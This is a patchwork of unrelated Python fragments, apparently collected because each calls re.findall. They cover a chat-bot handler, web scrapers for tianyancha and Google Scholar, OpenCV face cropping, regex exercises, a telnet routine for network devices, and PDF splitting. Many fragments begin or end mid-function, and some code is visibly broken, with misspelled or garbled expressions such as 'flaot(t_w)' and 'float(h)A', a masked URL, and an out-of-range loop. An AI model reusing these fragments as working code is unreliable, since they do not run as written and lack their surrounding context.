message, command_keyword[0])) except Exception as err: return str(err) else: return result_command else: print("Didn't find resultCommand for {}".format(command_raw)) message["text"] = "/help" return inputs["default"], process_command(inputs, message) else: # SERVICE MAINTENANCE CHECK if function_switch == "OFF": print("Service down for maintenance") raise ValueError("Unable to handle operation") issue_number = re.findall("#\d{4}|#\d{3}", message.get("text")) if len(issue_number) != 0: print("Current request json {}".format(message)) print("Found request for issue number {}".format(issue_number[0])) return git.parse_issue(issue_number[0][1:]) elif message.get("text").startswith("## Issue explanation (write below this line)"): reporter_from = message.get("from") user_name = reporter_from.get("username") print("Found reporter {}, message {}".format(reporter_from, message.get("text"))) return inputs["createissue"].format(git.create_issue(issue_create_uri, issue_token, message.get("text"), user_name)) else: print("Unable to handle operation for chat id {}".format(message.get("chat").get("id"))) raise ValueError("Unable to handle operation") elif message.get("new_chat_member"): # SERVICE MAINTENANCE CHECK if function_switch == "OFF": print("Service down for maintenance") raise ValueError("Unable to handle operation") print("Current request json {}".format(message)) print("New member added to group: {}".format(message.get("new_chat_member"))) return inputs["member"].format(message.get("new_chat_member").get("first_name")), inputs["member2"]
def get_code(): r = requests.get('https://www.tianyancha.com/', headers=headers) code = re.findall( r'https://static.tianyancha.com/fonts-styles/css/(.*?)/font.css', r.text)[0] return code
def get_kernel(kernels_raw): for kernel in re.findall( r"kernel.*?\s+(\S+)\s+\S+", kernels_raw, re.MULTILINE): yield kernel
for video in folders: images = os.listdir(os.getcwd() + '/' + str(video)) current_path = os.getcwd() + "/" + str(video) for i in images: image_file_name = current_path + "/" + i img = cv2.imread(image_file_name, 0) faces = face_cascade.detectMultiScale(img, 1.3, 5) print(faces) t_h,t_w = img.shape for f in faces: x, y, w, h = [ v for v in f ] #drop face if it is smaller than 40 px if w < 40 or h < 40: continue #drop face if face relatively too small in screen if True and (float(w)/flaot(t_w) <ratio or float(h)A/float(t_h)<ratio): continue cv2.rectangle(img, (x,y), (x+w,y+h), (255,255,255)) sub_face = img[y:y+h, x:x+w] resize_face = cv2.resize(sub_face, (48, 48)) resize_face = cv2.equalizeHist(resize_face) id = re.findall(r'\d+', str(i))[0] face_file_name = current_path + "/" + str(id) + "face.jpg" cv2.imwrite(face_file_name, resize_face) print("saved" + face_file_name) #remove image file #os.remove(image_file_name) ##uncomment to clean !
import re pattern = r'[^@ ]+@[^@]+\.[^@]{3}' com = re.compile(pattern) string = '[email protected] [email protected] Raj@gmail [email protected]' obj = re.findall(pattern, string) if obj: print(obj) else: print("no match found")
# -*- coding: utf-8 -*- """ Created on Fri Mar 20 18:17:41 2020 @author: kisku """ import re """ a. digit at the beginning of the string and a digit at the end of the string b. A string that contains only whitespace characters or word characters c. A string containing no whitespace characters """ # to find digit in begining and end of string. re.findall(r"(?<!\d)\d+(?!\d)", text) # to find string that contains only whitespace characters or word characters. re.findall(r"[\w\s]*",text) # string containing no whitespace characters re.findall(r"[^\W]*",text)
os.chdir("L:\MitchumLab\Individual Lab Folders\XunliangLiu\CLAVATA_project\Infection_BIK_WT_2") def filetype(fn): if '.' in fn: return fn.split('.')[-1] else: print (fn, "is not a file name!") return -1 for root, dirs, files in os.walk('.'): for f in files: fext = filetype(f).lower() if filetype(f) != -1 else next if fext == 'tif' or fext == 'tiff': ## use 2-digit for plate# instand of 1-digit if re.findall("R\dP\d[A,B,C]\dT\d",f): newfn = "P0".join(f.split('P')) os.rename(root + '/' + f, root + '/' + newfn) print ("!!! Rename... ", f, "to", newfn) ## if file name end with '_', add a number at the end if f.split('.')[-2][-1] == '_': s=1 while True: jnt = '_' + str(s) newfn = jnt.join(f.split('_')) if not newfn in files: # if file name already exist, file# add 1 os.rename(root + '/' + f, root + '/' + newfn) break print ("filename ", newfn, "exist") s = s+1
def command_get_output(self): self.__command_output_list = [] tn = self.__tn # 输入CTRL+Z前退出到原始状态 tn.write(b'\32\n') try: # 暴力进入sysmode,思科华为的命令都输进去,无论什么设备百分百进入。 # 尝试登录sysmod,输入登录命令 tn.write(('system-view' + "\n").encode('utf-8')) # 输入enable命令 tn.write((self.__enable_command + "\n").encode('utf-8')) except: pass # 输入命令以获取网络设备的sysmodtag tn.write(self.__command_output_more_input_command.encode('utf-8')) # 等1秒待命令输出 time.sleep(1) #print(tn.read_very_eager()) sysmodtag = (re.findall( r'#|]', tn.read_very_eager().decode('utf-8'))[0]).encode('utf-8') print('!!!!!!!!!!!!', 'sysmodtag is:', sysmodtag, '!!!!!!!!!!!!!!') tn.write(self.__command_output_more_input_command.encode('utf-8')) # 提示输入的命令 print('Input command:', self.__command_input) # 输入命令 tn.write((self.__command_input + '\n').encode('utf-8')) # 将输入命令的返回值赋值response,命令返回值前两个输出不是期望的返回值而是空值 #time.sleep(0.5) response = tn.read_very_eager() #print('########', response, '##############') # 将输入命令的返回值赋值response,如果sysmodtag在response则表示命令输出完整,否则输入命令获取完整的命令 while sysmodtag not in response: # 命令返回值未完结时,输入继续输出命令获取值的命令 tn.write(self.__command_output_more_input_command.encode('utf-8')) # 获取命令返回值并赋值给response, 用response捕获命令结束提示 #response = tn.read_until(self.__command_output_more_tag_prompt, timeout=0.5) response = tn.read_very_eager() # print('@@@@@@@@@@@@@@@@@', response, '@@@@@@@@@@@@@@@') # 将获取命令返回值赋值给response_format response_format = response # 将response_format重新编码 response_format = response_format.decode('utf-8') # print(response_format) # 将response_format格式化 response_format = re.sub(r'-- \x08.*\x08', '', response_format) response_format = re.sub(r' ', '', response_format) response_format = re.sub(r'\s----.*16D', '', response_format) response_format = re.sub(r'.*16D\s*.*16D', '', response_format) response_format = re.sub(r' ----', '', response_format) response_format = re.sub(r' ', '', response_format) response_format = re.split(r'\r\n', response_format) # 删除命令的返回值中对于的无效返回值 for item in response_format: if self.__command_output_more_tag_prompt.decode( 'utf-8') in item: response_format.remove(item) # 将输入命令的返回值添加到列表 for item in response_format: print(item) self.__command_output_list.append(item) time.sleep(1) # 提示正在获取命令返回值 # print(response_format) # print('Getting command output, please wait.', n, 'lines command output had gotten.') # 获取完整的命令输出后提示完成 print('All command output had gotten!!!') # 这些代码没用了,但是先留着可能有用 #else: # print(2229) # response_format = response # print(response_format) # response_format = response_format.decode('utf-8') # response_format = re.split(r'\r\n', response_format) # for item in response_format: # print(item) # 这些代码没用了,但是先留着可能有用 # 删除无效的多余的非命令返回值 for item in self.__command_output_list: if self.__command_output_more_tag_prompt.decode('utf-8') in item: self.__command_output_list.remove(item) return self.__command_output_list
def f(self): for i in range(0,1000,100): if (int(self.maxP.encode('utf-8'))<=i): pageSize = i break n_papers= 0 #to count normalized papers. sum_citations= 0 counter = 0 ncounter = 0 acounter= 0 bcounter= 0 # to count total numbers citations an author recieved. #{ looping trough pages to get all the publications for j in range(0,pageSize, 100): S_url=self.url + "&cstart=" + str(j) +"&pagesize=100" with urllib.request.urlopen(S_url) as my_url: page_html = my_url.read() page_soup = soup(page_html, "html.parser") if (j == 0): Name= page_soup.find('div', {'id': 'gs_prf_in'}) aTag = page_soup.findAll('td', {'class': 'gsc_rsb_std'}) Titles = page_soup.findAll('td', {'class': 'gsc_a_t'}) Citations_soup = page_soup.findAll('td', {'class': 'gsc_a_c'}) Years = page_soup.findAll('td', {'class': 'gsc_a_y'}) info_page = page_soup.findAll('a', {'class' : 'gsc_a_at'}) authors_soup= page_soup.findAll('div', {'class': 'gs_gray'}) #{ loop to get all the pop up urls and then collect number of co-authors from there for author in info_page: Author_names_link = author["data-href"] user=Author_names_link[53:65] n_input=Author_names_link[-12:] n_author_url="https://scholar.google.com.au/citations?user="******"&hl=en#d=gs_md_cita-d&u=%2Fcitations%3Fview_op%3Dview_citation%26hl%3Den%26user%3D"+user+"%26citation_for_view%3D"+user+"%3A"+n_input+"%26tzom%3D-330" N_author_url.append(n_author_url) less_authors_name=[] for a in authors_soup: less_authors_name.append(a.text) for i in range(0, len(less_authors_name), 2): author_names_list.append(less_authors_name[i]) for title in Titles: Title = title.a.text x=Title.encode('utf-8') title_list.append(x.decode('utf-8', 'ignore')) #title_list has all the titles for c in Citations_soup: p= c.text.encode('utf-8') r=p.decode('utf-8', 'ignore') q= re.findall('[0-9]+',r) Citations.append(q) n_author_names_list= [] for j in author_names_list: if '...' not in j: n_author_names_list.append(author_names_list[counter]) counter+=1 continue else: n_author_names_list.append('#') url_to_counter.append(counter) counter+= 1 if len(url_to_counter) != 0: driver= webdriver.Firefox() driver.implicitly_wait(0.2) for url in url_to_counter: print (url) print (N_author_url[url]) driver.get(N_author_url[url]) time.sleep(0.5) title= driver.find_elements_by_xpath('//div[@class="gsc_vcd_value"]') page_element = title[0].text print (page_element) coAuths.append(len(page_element.split(','))) driver.quit() for name in n_author_names_list: if (name=='#'): number_of_coauths.append(coAuths[acounter]) acounter+=1 else: number_of_coauths.append(len(name.split(','))) for entry in Citations: try: newCitations.append(entry[0]) except: newCitations.append(0) #newCitations has all the citations as a list for element in range(len(title_list)): n_papers +=1/number_of_coauths[element] n_citations.append(int(int(newCitations[element])/number_of_coauths[element])) for k in newCitations: try: sum_citations+= int(k[0]) except: continue #print ('a', title_list) #print('b', newCitations) #print('c', number_of_coauths) #print('d', n_citations) #print('e', int(n_papers)) #print('f', int(sum(n_citations))) #print('g', int(sum(n_citations)/ len(title_list))) for entity in range(len(title_list)): a= Author(Title_name= title_list[entity], Citations=newCitations[entity], CoAuthors= number_of_coauths[entity], Normalized_citations= n_citations[entity] ) a.save() normalized_papers= int(n_papers) total_normalized_citations= int(sum(n_citations)) #normalized_h_index= int(sum(n_citations)/len(title_list)) nn_citations= n_citations[0:normalized_papers] nn_citations.sort(reverse= True) for i in nn_citations: ncounter+= 1 print (ncounter, i) if(ncounter> i): normalized_h_index= ncounter-1 break return (normalized_papers, total_normalized_citations, normalized_h_index)
def get_external_ip(): url = 'http://checkip.dyndns.org' requesty = urllib.request.urlopen(url).read().decode('utf-8') externalIP = re.findall('\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}', requesty) return externalIP
pdf_merger.append(firstpdf) pdf_merger.merge(insertpage, secondpdf) # # 添加书签 # pdf_merger.addBookmark('这是一个书签', 1) pdf_merger.write('merge_pdf.pdf') # # def split_by_num(filename, nums, password=None): filename = r'F:\研一下\量化投资资料\量化教材\Hands-On_Machine_Learning_for_Algorithmic_Trading.pdf' pdf_reader = PdfFileReader(open(filename, mode='rb' )) pages = pdf_reader.getNumPages() outline = pdf_reader.getOutlines() outlinchapter = [] outlinepage = [i+18 for i in [8,33,65,88,119,147,175,224,260,284,312,351,389,418,441,458]] for o in outline: res = re.findall(r"'/Title': '(.*?)', '/Page': IndirectObject\((.*?), 0\)",str(o),re.S) if 'Chapter' in res[0][0]: outlinchapter.append(res[0][0]) #print(list(outlinedict[0].keys())[0],list(outlinedict[0].values())[0]) outlinedict =[{i[0]:i[1]} for i in zip(outlinchapter,outlinepage)] for i in range(len(outlinedict)+1): pdf_writer = PdfFileWriter() split_pdf_name = list(outlinedict[i].keys())[0].replace(':','') + '.pdf' start = list(outlinedict[i].values())[0] end = list(outlinedict[i+1].values())[0] print(split_pdf_name) for i in range(int(start), int(end)): pdf_writer.addPage(pdf_reader.getPage(i)) with open(split_pdf_name,'wb') as out: